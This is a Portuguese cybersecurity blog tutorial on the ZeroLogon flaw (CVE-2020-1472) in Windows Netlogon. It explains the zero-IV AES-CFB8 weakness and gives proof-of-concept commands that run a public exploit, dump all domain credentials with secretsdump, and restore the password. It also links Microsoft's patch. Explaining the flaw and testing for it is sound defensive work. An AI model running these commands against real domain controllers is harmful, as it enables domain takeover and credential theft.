Explorando o ZeroLogon (CVE-2020-1472)

Existe uma vulnerabilidade de elevação de privilégio usando uma conexão de canal seguro Netlogon vulnerável a um controlador de domínio, usando o protocolo remoto Netlogon (MS-NRPC).

O Microsoft Windows Netlogon Remote Protocol (MS-NRPC) é um componente de autenticação principal do Active Directory que fornece autenticação para contas de usuário e computador.

A vulnerabilidade conhecida como Zerologon compromete um controlador de domínio não autenticado ao subverter a criptografia do Netlogon (CVE-2020-1472) O MS-NRPC usa um vetor de inicialização (IV) de 0 (zero) no modo AES-CFB8 ao autenticar contas de computador.

A função ComputeNetlogonCredential, define que este IV é fixo e deve sempre consistir em 16 bytes zero. Isso viola os requisitos para usar AES-CFB8 com segurança.

Mais detalhes técnicos em https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472

Prova de Conceito

Eu uso o Kali Linux 2020 e para essa teste é necessário duas soluções:

  • cve-2020-1472-exploit.py – Exploit 
git clone https://github.com/dirkjanm/CVE-2020-1472.git  
  • Impacket – Uma coleção de classes Python para trabalhar com protocolos de rede.
git clone https://github.com/SecureAuthCorp/impacket.git  

Depois da instalação. Execute o comando do exploit:

python3 cve-2020-1472-exploit.py [NOMEDODC] [IP] 

Uma vez explorado com sucesso, significa que foi redefinida a senha da conta do controlador de domínio e agora ela é nula, podemos usar o seguinte comando para fazer o dump das credenciais.

Atenção – Não execute em produção e tenha ciência que você pode danificar as comunicações com os controladores de domínio

secretsdump.py -just-dc [NOMEDODOMINIO]/[NOMEDODC]\$@[IP]

Você pode restaurar a credencial da conta usando o comando:

python restorepassword.py [NOMEDODOMINIO]/[NOMEDODC]@[NOMEDODC] -target-ip [IP] -hexpass [CREDENCIAL-HEX]

Solução

A Microsoft publicou um comunicado que fornece atualizações para esta vulnerabilidade. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

Fontes e recursos

Se você estiver interessado nos detalhes técnicos por trás dessa vulnerabilidade única e como ela foi descoberta, baixe o white paper aqui.

Anúncio

Sobre Daniel Donda 549 Artigos
Olá, meu nome é Daniel Donda e sou especialista em cibersegurança, autor de livros, professor e palestrante. Saiba mais

1 Comentário

  1. Aqui na empresa “uma empresa do governo”, foi pedido para verificarmos todas as vulnerabilidades atuais, inclusive esta. Tem uma atualização da microsoft para essa falha. Pessoal do governo ficaram bem assustados com os últimos ataques.

1 Trackback / Pingback

  1. Ataque ao STJ e a outros orgãos públicos - SocialSec

Faça um comentário

Seu e-mail não será divulgado.


*